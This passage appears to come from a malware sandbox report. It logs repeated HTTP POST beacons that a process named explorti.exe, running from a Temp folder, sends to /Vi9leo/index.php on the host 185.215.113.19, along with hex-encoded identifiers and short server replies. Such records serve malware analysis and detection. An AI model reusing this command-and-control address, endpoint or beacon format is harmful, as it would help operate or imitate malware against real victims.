Jul 26, 2024 12:57:30.385998964 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 12:57:30.386681080 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 38 37 35 42 30 35 46 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2875B05F82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 12:57:30.634886026 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.5	49734	185.215.113.19	80	7912	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 12:57:30.745906115 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 12:57:31.540679932 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 12:57:31.541559935 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 38 37 35 42 30 35 46 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2875B05F82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 12:57:31.792881012 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.5	49735	185.215.113.19	80	7912	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 12:57:31.901133060 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 12:57:32.902621031 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 12:57:32.903103113 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 12:57:32.903557062 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 38 37 35 42 30 35 46 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2875B05F82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 12:57:33.160274982 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.5	49736	185.215.113.19	80	7912	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 12:57:33.291346073 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 12:57:34.056238890 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 12:57:34.057033062 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 38 37 35 42 30 35 46 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2875B05F82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 12:57:34.313539028 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.5	49737	185.215.113.19	80	7912	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 12:57:34.460566998 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 12:57:35.228821039 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 12:57:35.229660988 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 38 37 35 42 30 35 46 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2875B05F82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 12:57:35.479022980 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.5	49738	185.215.113.19	80	7912	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 12:57:35.798521042 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 12:57:36.611177921 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 12:57:36.612272024 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 38 37 35 42 30 35 46 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2875B05F82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 12:57:36.862970114 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.5	49739	185.215.113.19	80	7912	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 12:57:36.978559017 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 12:57:37.797775030 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 12:57:37.798769951 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 38 37 35 42 30 35 46 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2875B05F82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 12:57:38.073822975 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.5	49740	185.215.113.19	80	7912	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 12:57:38.185173988 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 12:57:38.974189997 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 12:57:38.975040913 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 38 37 35 42 30 35 46 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2875B05F82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 12:57:39.227685928 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.5	49741	185.215.113.19	80	7912	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 12:57:39.338327885 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 12:57:40.109982967 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 12:57:40.111118078 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 38 37 35 42 30 35 46 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2875B05F82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 12:57:40.412739992 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.5	49742	185.215.113.19	80	7912	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 12:57:40.539869070 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 12:57:41.310508966 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 12:57:41.311573982 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 38 37 35 42 30 35 46 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2875B05F82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 12:57:41.560986042 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.5	49743	185.215.113.19	80	7912	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 12:57:41.681962013 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 12:57:42.431364059 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 12:57:42.432315111 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 38 37 35 42 30 35 46 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2875B05F82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 12:57:42.678586960 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.5	49744	185.215.113.19	80	7912	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 12:57:42.793215990 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 12:57:43.558820963 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 12:57:43.559541941 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 38 37 35 42 30 35 46 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2875B05F82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 12:57:43.870841026 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.5	49745	185.215.113.19	80	7912	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 12:57:43.979037046 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 12:57:44.850186110 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 12:57:44.850817919 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 38 37 35 42 30 35 46 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: 